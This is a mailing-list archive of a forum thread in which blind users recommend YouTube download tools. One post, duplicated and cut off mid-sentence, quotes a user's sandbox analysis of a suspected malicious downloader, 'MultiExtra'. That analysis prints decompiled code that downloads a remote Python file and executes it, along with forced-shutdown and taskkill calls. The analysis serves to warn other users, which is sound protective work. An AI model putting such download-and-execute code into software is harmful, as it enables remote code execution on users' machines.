Re: Best Recommendations for Downloading Youtube Videos

2020-02-21 Thread AudioGames . net Forum — Off-topic room : Turkce_Rap via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Why do You guys advise youtube-dl to people who are unaware of programing. its'a python lib.Anyway i can suggest 4k downloader and pontes boath are fine.

URL: https://forum.audiogames.net/post/503208/#p503208




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-21 Thread AudioGames . net Forum — Off-topic room : an idiot via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Krantikari, have you read any of this? This is from the topic that was made about this a long time ago.Really look. You don't just fix, something like this. Also remember blind extra, which was a virus, no question about it.Posts start.OK, OK. Everyone cool it. As we speak I am sandboxing the program and am going to post my findings once I have unpacked the setup files and can get access to the actual executable (the setup itself is not harmful, according to virus total). Analyzing the installed program in my sandbox, I notice many things off of the bat, one of which is notable -- this program is written in Python! Python 3.6, to be precise. Extracting the setup file ("installing" it in my sandbox) and extracting the .exe file, I see the pyinstaller archive files, and now I have the compiled python bytecode. At this stage decompilation is trivial: I see that the app has the standard python stdlib, chardot, and this file called... MEX.pyc. Mmm... and what could this be?Oh dear! Some suspicious code! Looky, friends:import glob, wx, urllib.request, re, sys, webbrowser, threading, subprocess, os, locale, win32clipboard, pyperclip, datetime, time, ctypes, gettextfrom html2text import html2textfrom playsound import playsoundimport encodings.idnaget = os.environ['temp']item = urllib.request.urlretrieve('http://softjewel.droppages.com/MultiExtra/Data/MAX.py', 'MAX.py')exec(open('MAX.py').read())Looking at this "max.py" file...First, it imports its "needed" modules. Then... there's this exception handler that gets it to try to remove itself from the file system. Should that fail, it does nothing.Next, it trys to change to c:\ProgramData\MultiExtra. Not sue how that'll work since the app doesn't create it (maybe the setup does?). It then creates an appdata folder and creates its multiextra.ini file.The worying thing however is how many downloads this thing does. There's another download on line 92 (the rest of the above discussion is just it doing its normal configuration) that it reads from using the URL http://softjewel.droppages.com/MultiExtra/Data/MAX.txt. (Note the lack of 'https'.) This file... doesn't seem to contain anything, if I browse to it. It also links to NVDA as well. (Note that this is the "actual" NVDA file, and is not malicious -- just version 2018.1.1, but it replaces that with the latest version on softpedia for some reason.)We're not done though! This program also seems to do some very disturbing subprocess calls. In particular:Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info)It also runs command prompt:Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info)And this...Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info)And, of course, the end of the application, when it try's to taskkill itself instead of exiting properly:Line 2,195: subprocess.Popen("taskkill /f /im MultiExtra.exe", startupinfo=info, shell=True)Some things to note with these subprocess calls:* Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info): This one isn't harmful -- unless, of course, he sets it to something like csrss's PID or another critical system process if he's able to gain that level of privilege.* Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info): this one is... entirely unnecessary and pointless. I don't get it. I don't really get what its trying to do (I think "MultiExtraDownloads\Apps" is some kind of executable or batch script or something like that).* Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info): -s shuts down the computer, only; -t (/t) ells it to do an immediate shutdown.There are also some other os.remove calls that are in here. I'd be happy to fully decompile all the code and upload it somewhere for people like cartertemm to go over and review.As for the "this program steels files" accusation, I'm checking on that.OK, I can't confirm that either way. It doesn't use shutil or networking -- that I can see anyway, other than urllib. It doesn't use shutil so it can't do any bulk copys, and it doesn't use os.rename, os.renames, or os.link/os.unlink, nor does it contact any remote servers via obscure protocols. Not that I can find, at any rate. So I think that for now we can discard that accusation (though don't bank on that, I didn't decompile the entire program tree).In sum: the program does some disturbing activity which I'd like others to take up (I'm not going to read the entire program). On the surface it is *not* harmful. I repeat: it is *not* harmful on the surface. However, I would hold off accusations and destruct

Re: Best Recommendations for Downloading Youtube Videos

2020-02-21 Thread AudioGames . net Forum — Off-topic room : an idiot via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Krantikari, have you read any of this? This is from the topic that was made about this a long time ago.Really look. You don't just fix, something like Posts start.OK, OK. Everyone cool it. As we speak I am sandboxing the program and am going to post my findings once I have unpacked the setup files and can get access to the actual executable (the setup itself is not harmful, according to virus total). Analyzing the installed program in my sandbox, I notice many things off of the bat, one of which is notable -- this program is written in Python! Python 3.6, to be precise. Extracting the setup file ("installing" it in my sandbox) and extracting the .exe file, I see the pyinstaller archive files, and now I have the compiled python bytecode. At this stage decompilation is trivial: I see that the app has the standard python stdlib, chardot, and this file called... MEX.pyc. Mmm... and what could this be?Oh dear! Some suspicious code! Looky, friends:import glob, wx, urllib.request, re, sys, webbrowser, threading, subprocess, os, locale, win32clipboard, pyperclip, datetime, time, ctypes, gettextfrom html2text import html2textfrom playsound import playsoundimport encodings.idnaget = os.environ['temp']item = urllib.request.urlretrieve('http://softjewel.droppages.com/MultiExtra/Data/MAX.py', 'MAX.py')exec(open('MAX.py').read())Looking at this "max.py" file...First, it imports its "needed" modules. Then... there's this exception handler that gets it to try to remove itself from the file system. Should that fail, it does nothing.Next, it trys to change to c:\ProgramData\MultiExtra. Not sue how that'll work since the app doesn't create it (maybe the setup does?). It then creates an appdata folder and creates its multiextra.ini file.The worying thing however is how many downloads this thing does. There's another download on line 92 (the rest of the above discussion is just it doing its normal configuration) that it reads from using the URL http://softjewel.droppages.com/MultiExtra/Data/MAX.txt. (Note the lack of 'https'.) This file... doesn't seem to contain anything, if I browse to it. It also links to NVDA as well. (Note that this is the "actual" NVDA file, and is not malicious -- just version 2018.1.1, but it replaces that with the latest version on softpedia for some reason.)We're not done though! This program also seems to do some very disturbing subprocess calls. In particular:Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info)It also runs command prompt:Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info)And this...Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info)And, of course, the end of the application, when it try's to taskkill itself instead of exiting properly:Line 2,195: subprocess.Popen("taskkill /f /im MultiExtra.exe", startupinfo=info, shell=True)Some things to note with these subprocess calls:* Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info): This one isn't harmful -- unless, of course, he sets it to something like csrss's PID or another critical system process if he's able to gain that level of privilege.* Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info): this one is... entirely unnecessary and pointless. I don't get it. I don't really get what its trying to do (I think "MultiExtraDownloads\Apps" is some kind of executable or batch script or something like that).* Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info): -s shuts down the computer, only; -t (/t) ells it to do an immediate shutdown.There are also some other os.remove calls that are in here. I'd be happy to fully decompile all the code and upload it somewhere for people like cartertemm to go over and review.As for the "this program steels files" accusation, I'm checking on that.OK, I can't confirm that either way. It doesn't use shutil or networking -- that I can see anyway, other than urllib. It doesn't use shutil so it can't do any bulk copys, and it doesn't use os.rename, os.renames, or os.link/os.unlink, nor does it contact any remote servers via obscure protocols. Not that I can find, at any rate. So I think that for now we can discard that accusation (though don't bank on that, I didn't decompile the entire program tree).In sum: the program does some disturbing activity which I'd like others to take up (I'm not going to read the entire program). On the surface it is *not* harmful. I repeat: it is *not* harmful on the surface. However, I would hold off accusations and destructive comments until people like cartertemm (and even myself if I decide to 

Re: Best Recommendations for Downloading Youtube Videos

2020-02-21 Thread AudioGames . net Forum — Off-topic room : Krantikari via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

I am using multi extra since  it was published.it had not harmed my computer.and about the virus warning its just a false warning and now it has been fixed by the developer.

URL: https://forum.audiogames.net/post/503173/#p503173




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-20 Thread AudioGames . net Forum — Off-topic room : Blindgamer28 via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

YouTube dl is the best i had created a cmd batch files for downloading playlists and single videos music et using youtube dlcthrough promts, like when you click on the script it will ask for the link of the video/playlist channel and also it will jenerate the log and avoids downloading multiple files,

URL: https://forum.audiogames.net/post/502940/#p502940




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-20 Thread AudioGames . net Forum — Off-topic room : Blindgamer28 via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

YouTube dl is the best i had created a cmd script for downloading playlists and single videos music etcthrough promts, like when you click on the script it will ask for the link of the video/playlist channel and also it will jenerate the log and avoids downloading multiple files,

URL: https://forum.audiogames.net/post/502940/#p502940




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-19 Thread AudioGames . net Forum — Off-topic room : soren via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

multi extra damaged my computer i needet to reinstall windows after that

URL: https://forum.audiogames.net/post/502787/#p502787




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-19 Thread AudioGames . net Forum — Off-topic room : an idiot via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

No, I really wouldn't. It's a virus.

URL: https://forum.audiogames.net/post/502716/#p502716




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-19 Thread AudioGames . net Forum — Off-topic room : Krantikari via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

use multi extra its a good youtube downloader

URL: https://forum.audiogames.net/post/502695/#p502695




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-18 Thread AudioGames . net Forum — Off-topic room : turtlepower17 via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Quite some time ago, someone on this forum uploaded some batch files which interface with youtubeDL. It comes with a text document called links.txt which you paste any amount of URL's into that you want, each on a separate line. Then, depending on which format you want, you run the corresponding file (always as an administrator, it never worked for me otherwise) so, if you just want video, you run Youtube2video.bat. I can upload that if the person doesn't mind, I honestly don't remember who it was or if they're still posting here, but I figured I'd ask first in case they've decided they don't want those files floating around for some reason. I love this method because it really couldn't get much simpler.I do still use Pontes on occasion, but the only thing that does that this doesn't is tag your files, so that's why I'll choose that method on occasion if I'm lazy and don't want to manually add ID3 tags myself.

URL: https://forum.audiogames.net/post/502490/#p502490




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-18 Thread AudioGames . net Forum — Off-topic room : turtlepower17 via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Quite some time ago, someone on this forum uploaded some batch files which interface with youtubeDL. It comes with a text document called links.txt which you paste any amount of URL's into that you want, each on a separate line. Then, depending on which format you want, you run the corresponding file (always as an administrator, it never worked for me otherwise) so, if you just want video, you run Youtube2video.bat. I can upload that if the person doesn't mind, I honestly don't remember who it was or if they're still posting here, but I figured I'd ask first in case they've decided they don't want those files floating around for some reason. I love this method because it honestly couldn't get any simpler.

URL: https://forum.audiogames.net/post/502490/#p502490




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-18 Thread AudioGames . net Forum — Off-topic room : brad via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Hi.Youtube-dl is easy to use, download the exe program, put it in the place you want to download the videos to, then go to command line and cd into that folder.Here's an example: cd downloads.Press enter, now you're in the downloads folder, type the following, youtube-dl space and paste the URL of the Video and press enter.You can do things with templats but i don't know much about that and you can download a thing to convert files to other formats but someone else will have to help you with that.

URL: https://forum.audiogames.net/post/502387/#p502387




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-18 Thread AudioGames . net Forum — Off-topic room : Jaidon Of the Caribbean via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

ytmp3 you can interthe format you wanna download it in.

URL: https://forum.audiogames.net/post/502375/#p502375




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-18 Thread AudioGames . net Forum — Off-topic room : Socheat via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

See post #5. That's why I was trying to explain to you.

URL: https://forum.audiogames.net/post/502373/#p502373




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : blindrobertbrown via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Thing is, I'm not looking to download them as mpe. I'm hoping to download them as mp4 or a video format that I can put on my IPhone.

URL: https://forum.audiogames.net/post/502330/#p502330




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : Jaidon Of the Caribbean via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

I use ytmp3.ccThey work like a dream. You can use 4K vido downloader, and I'm not sure if SongR still works.RHTH

URL: https://forum.audiogames.net/post/502281/#p502281




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : blindrobertbrown via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Okay, I checked out both options. I don't know anything about Python, so I'm not sure if I can use that, and my anti-virus program keeps flagging Pontes media downloader works for me as well. as containing tons of trogans. So I'm not sure what to do. How would one set up Youtube dl?

URL: https://forum.audiogames.net/post/502278/#p502278




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : blindrobertbrown via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Are your recommendations for the computer or something else? Because I'm trying to find a way to do it via my computer. I'm using a windows 10, mostly with google chrome, and with NVDA screen reader.

URL: https://forum.audiogames.net/post/502275/#p502275




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : an idiot via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

The  issue  I have  is the fact that it only converts into 128K bps even when using wav. I have found no way to change this and I have looked.  If this one thing was fixed,  you can be sure I would be using it.  It makes video downloading ridiculously easy.

URL: https://forum.audiogames.net/post/502261/#p502261




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : an idiot via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

The  issue  I have  is the fact that it only converts into 128K bps even when using wav. I have found no way to change this and I have looked.

URL: https://forum.audiogames.net/post/502261/#p502261




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : Dark via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Have to agree on pontes here. Yes it's essentially a frontend for other dl tools, but by god it's a good one.

URL: https://forum.audiogames.net/post/502242/#p502242




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : soren via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

with utube dl only with a jailbreak

URL: https://forum.audiogames.net/post/502239/#p502239




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : Blind angel 444 via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Can I use the iPad for downloading the videos too?

URL: https://forum.audiogames.net/post/502213/#p502213




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : Socheat via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Hi thereWhen you're watching a video, hit alt+D to go to your address bar, and add the dl after the www.

URL: https://forum.audiogames.net/post/502133/#p502133




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-17 Thread AudioGames . net Forum — Off-topic room : The coll gamer via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

Pontes media downloader works for me as well.

URL: https://forum.audiogames.net/post/502111/#p502111




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-16 Thread AudioGames . net Forum — Off-topic room : soren via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

youtube dl is the best

URL: https://forum.audiogames.net/post/502092/#p502092




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector


Re: Best Recommendations for Downloading Youtube Videos

2020-02-16 Thread AudioGames . net Forum — Off-topic room : seb2314 via Audiogames-reflector


  


Re: Best Recommendations for Downloading Youtube Videos

I love youtube-dl, however I'm sure someone will give you an easier solution

URL: https://forum.audiogames.net/post/502038/#p502038




-- 
Audiogames-reflector mailing list
Audiogames-reflector@sabahattin-gucukoglu.com
https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector